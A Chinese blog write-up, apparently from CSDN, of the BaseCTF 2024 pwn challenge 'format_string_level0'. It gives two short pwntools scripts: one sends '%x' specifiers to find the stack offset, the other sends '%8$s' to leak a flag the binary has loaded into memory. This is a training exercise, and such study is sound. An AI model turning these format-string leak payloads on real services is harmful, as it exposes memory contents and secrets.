basectf2024 pwn week2-[Week2] format_string_level0

最新推荐文章于 2024-09-18 23:38:03 发布
最新推荐文章于 2024-09-18 23:38:03 发布
阅读量198 收藏
点赞数 1
分类专栏: Pwn 文章标签: pwn
加油加油~
本文链接:https://blog.csdn.net/wcj126/article/details/142281209
版权

知识点:

格式化字符串漏洞

因为是用的read,其实应该也可以构造shellcode,但是好像全开了

但是因为这道题,自己读取了flag

所以我们找到flag和buf差多少

发现ptr(存flag)和buf差2

我们去找到buf

from pwn import *
io=process("./pwn")
#io=remote("challenge.basectf.fun",35185)
elf=ELF("./pwn")
context(arch=elf.arch,os=elf.os,log_level = "debug")
payload=flat(b'aaaa'+b'-%x'*20
io.send(payload)
io.recv()
io.interactive()

我们可以发现buf是在第十个参数

那么ptr就是第八个

from pwn import *
io=process("./pwn")
#io=remote("challenge.basectf.fun",35185)
elf=ELF("./pwn")
context(arch=elf.arch,os=elf.os,log_level = "debug")
payload=flat(b'%8$s')
io.send(payload)
io.recv()
io.interactive()

成功!

_Nickname
关注
专栏目录
CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换
serfend's blog
04-14 507
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码:mpgo 答案:flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路 发现get_flag的位置 发现输入会被替换,构造exp 详细步骤 查看文件信息 查看题目发现是将用户输入的I替换为you,虽然输入的时候只允许输入32位,但是因为替换
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
[BaseCTF 2024] 高校联合新生赛 PWNweek1-7)
weixin_52640415的博客
08-22 512
pwn这块会略写,毕竟只有有用的才需要记。
2024 BaseCTF
2302_81899310的博客
09-03 979
拿到题目同样我们先用checksec检查一下保护发现题目只开启了数据段不可执行的保护,所给文件为64位的可执行文件,丢进ida里发现read函数存在栈溢出漏洞,同时未发现后门函数。题目中还给出了libc,所以我们自然想到此题型为ret2libc3,我们首先需要泄露出已知函数在libc中的地址,从而算出基地址,后根据libc中system函数的地址和/bin/sh的地址来构造payload,从而获取shell.
2024年BaseCTF新生赛wp(前三周)
2301_79200709的博客
09-06 1655
根据题目改数据包,最后提示flag已经出现过了,说明可能是需要抓包看每一步的响应数据这样就能看见flag已经有了,base64解码就可以得到。
BaseCTF Week2
Fab1an的博客
08-29 1414
无回显RCE。
BaseCTF-PWN
2301_79696060的博客
09-18 789
很久没发博客了,有点摆,不过最近刚好打了新生赛,记录一下。
hgame2023 week2 writeup
02-03 9706
hgame2023 week2
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 3548
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Java 代码实现了一个简单的文本编辑器-可运行
10-17
Java 代码实现了一个简单的文本编辑器
MATLAB实现基于Attention-LSTM的多特征分类预测(含完整的程序和代码详解)
10-17
内容概要:本文详细介绍了如何使用MATLAB实现基于Attention机制的LSTM模型进行多特征分类预测。主要内容包括程序设计思路、代码实现、模型构建与训练、模型评估及可视化、以及简单的GUI界面设计。模型可以在多个领域应用,如金融数据分析、医疗诊断等。 适合人群:对深度学习和分类预测感兴趣的科研人员和开发人员,具备一定的MATLAB和深度学习基础。 使用场景及目标:适用于需要处理时间序列数据并进行分类预测的项目。目标是通过Attention-LSTM模型提高分类准确率,同时提供直观的可视化结果和友好的用户界面。 其他说明:文中提供了详细的代码实现和注释,读者可以通过实践加深对模型的理解。此外,还讨论了模型优化和未来的研究方向。
基于Flask和SQLAlchemy 的简易仓库管理系统源码(期末课程设计).zip
10-17
基于Flask和SQLAlchemy 的简易仓库管理系统源码(期末课程设计).zip 1.多数小白下载后,在使用过程,可能会遇到些小问题,若自己解决不了,请及时私信描述你的问题,我会第一时间提供帮助,也可以远程指导 2.项目代码完整可靠,谈不上高分、满分(多数为夸大其词),但难度适中,满足一些毕设、课设要求,且属于易上手的优质项目,项目内基本都有说明文档,按照操作即可,遇到困难也可私信交流 3.适用人群:各大计算机相关专业行业的在校学生、高校老师、公司程序员等下载使用 4.特别是那种爱钻研学习的学霸,强烈推荐此项目,可以二次开发提升自己。如果确定自己是学渣,拿来作毕设、课设直接用也无妨,但自己还是尽可能弄懂项目最好!
民航网上订票系统 JAVA毕业设计 源码+数据库+论文 Vue.js+SpringBoot+MySQL.zip
最新发布
10-17
民航网上订票系统 JAVA毕业设计 源码+数据库+论文 Vue.js+SpringBoot+MySQL 系统启动教程:https://www.bilibili.com/video/BV11ktveuE2d
JAVA项目报告-闹钟的设计与实现.pdf
10-17
JAVA项目报告-闹钟的设计与实现.pdf
毕业设计论文SpringBoot考试信息报名系统.docx
10-17
毕业设计论文
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_Nickname

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值